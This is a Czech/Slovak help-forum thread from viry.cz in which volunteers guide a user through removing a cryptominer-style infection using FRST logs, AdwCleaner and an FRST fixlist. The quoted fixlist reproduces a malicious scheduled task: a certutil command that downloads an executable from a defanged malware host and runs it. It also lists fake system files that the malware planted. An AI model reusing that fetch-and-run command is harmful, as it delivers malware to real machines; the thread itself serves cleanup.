Description: The server Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy!CortanaUI did not register with DCOM within the required timeout.

==================== Memory info ===========================

BIOS: Insyde F.30 05/17/2018
Motherboard: HP 8330
Processor: AMD A6-9220 RADEON R4, 5 COMPUTE CORES 2C+3G
Percentage of memory in use: 91%
Total physical RAM: 3981.68 MB
Available physical RAM: 343.79 MB
Total Virtual: 7102.48 MB
Available Virtual: 1240.07 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:917.41 GB) (Free:824.92 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:12.87 GB) (Free:1.55 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (Disk) (CDROM) (Total:0.22 GB) (Free:0 GB) CDFS

\\?\Volume{5a149f60-8835-4201-8d99-005ae578cc78}\ (Windows RE tools) (Fixed) (Total:0.96 GB) (Free:0.37 GB) NTFS
\\?\Volume{16b57086-84fb-4baf-a552-2f3109fc0a33}\ () (Fixed) (Total:0.25 GB) (Free:0.17 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 7E2B67A8)

Partition: GPT.

==================== End of Addition.txt =======================

#2 Příspěvek od **Rudy** » 26 úno 2020 10:25

Zdravím!
Spusťte tuto utilitu:

Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

#3 Příspěvek od **JaRon** » 26 úno 2020 10:31

ahoj,
1. Tvorba fixlistu pro FRST
•Spustte poznamkovy blok (Start-spustit-notepad)
•Zkopirujte skript >>

Kód: Vybrat vše

Start
() [File not signed] C:\Program Files (x86)\IR\shutTask.exe
() [File not signed] C:\Program Files (x86)\Winamp\winampa.exe
() [File not signed] C:\Users\OKAY\AppData\Local\Temp\wup\wup.exe
() [File not signed] C:\Windows\rss\csrss.exe
() [File not signed] C:\Windows\windefender.exe
HKLM-x32\...\Run: [shutTask] => C:\Program Files (x86)\IR\shutTask.exe [110592 2010-01-05] () [File not signed]
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\Winampa.exe [12288 2003-04-02] () [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
Task: {1821277B-7577-4CB7-A199-D1325C563CDC} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\OKAY\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\OKAY\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {2FE9D757-7FDC-4BB8-B294-21CFAA208240} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3964928 2020-02-11] () [File not signed] <==== ATTENTION
2019-06-10 00:58 - 2019-06-10 00:58 - 000000000 _____ () C:\Users\OKAY\AppData\Local\BIT129D.tmp
2019-06-10 00:58 - 2019-06-10 00:58 - 000000000 _____ () C:\Users\OKAY\AppData\Local\BIT12BD.tmp
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
FirewallRules: [{8708BC7E-8036-49A3-8528-782A6BA3D477}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]



EmptyTemp:
Reboot:
End

•Ulozte vytvoreny TXT jako fixlist.txt
•Presunte vytvoreny fixlist vedle FRST

Spustte znovu FRST.exe
•Kliknete na Fix
•Probehne oprava a vytvori log Fixlog.txt

Restart PC a dejte mi sem fixlog.txt

2. vycisti PC s ADWCleanerom - log sem

#4 Příspěvek od **JaRon** » 26 úno 2020 10:34

ospravedlnujem sa Rudymu za vstup, ale ked som si uz dal pracu z fixlistom, vykonaj ho, inac patris Rudymu

ked som zacal pisat, este tam nebol prispevok

VIRY.CZ

Dobry den, CPU využité na 100%, v spravcovi aktivne "wup"

Dobry den, CPU využité na 100%, v spravcovi aktivne "wup"

Re: Dobry den, CPU využité na 100%, v spravcovi aktivne "wup

Re: Dobry den, CPU využité na 100%, v spravcovi aktivne "wup

Re: Dobry den, CPU využité na 100%, v spravcovi aktivne "wup